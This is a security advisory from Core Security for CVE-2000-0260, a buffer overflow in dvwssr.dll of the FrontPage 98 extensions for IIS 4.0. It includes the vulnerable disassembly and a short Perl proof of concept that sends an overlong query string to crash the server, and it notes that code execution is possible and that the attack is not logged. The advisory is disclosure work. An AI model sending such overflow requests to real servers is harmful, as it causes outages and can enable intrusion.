MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability

Advisory ID Internal
CORE-041200

1. Advisory Information

Date Published: 2000-04-14
Last Update: 2000-04-14
Advisory ID: CORE-041200
Bugtraq ID: 1109
CVE Name: CVE-2000-0260
Title: MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Class: Boundary Error Condition (Buffer Overflow)
Remotely Exploitable: Yes
Locally Exploitable: No
Release Mode: USER RELEASE

2. Vulnerability Description:

The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.

3. Vulnerable Packages:

  • Microsoft FrontPage 98 Server Extensions for IIS
  • Microsoft FrontPage 98
  • Microsoft IIS 4.0
  • Microsoft NT Option Pack for NT 4.0
  • Microsoft InterDev 1.0
  • Microsoft Windows NT 4.0

4. Solution/Vendor Information/Workaround:

Workaround: Delete DVWSSR.DLL (this may break InterDev).

5. Credits:

This vulnerability was found by Gerardo Richarte and Alberto Soliño from Core Security.

6. Technical Description - Exploit/Concept Code:

We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.

The code where the buffer overflow resides is:

mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url

So, below is an example of how to exploit this vulnerability:

Of course, having the source code makes it harder to find this types of bugs...

#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1
Host: yourhost

";

We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with this configuration, we have been able to make the code jump to our buffer.

Under these circumstances, the actual BO allows to execute arbitrary code in the target machine. It's interesting to note that no log is generated as effect of this attack.

7. About Core Security 

Core Security develops strategic security solutions for Fortune 1000 corporations, government agencies and military organizations. The company offers information security software and services designed to assess risk and protect and manage information assets. 

To learn more about Core Impact, the first comprehensive penetration testing framework, visit our website.

8. Disclaimer

The contents of this advisory are copyright (c) 2003 CORE Security Technologies and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.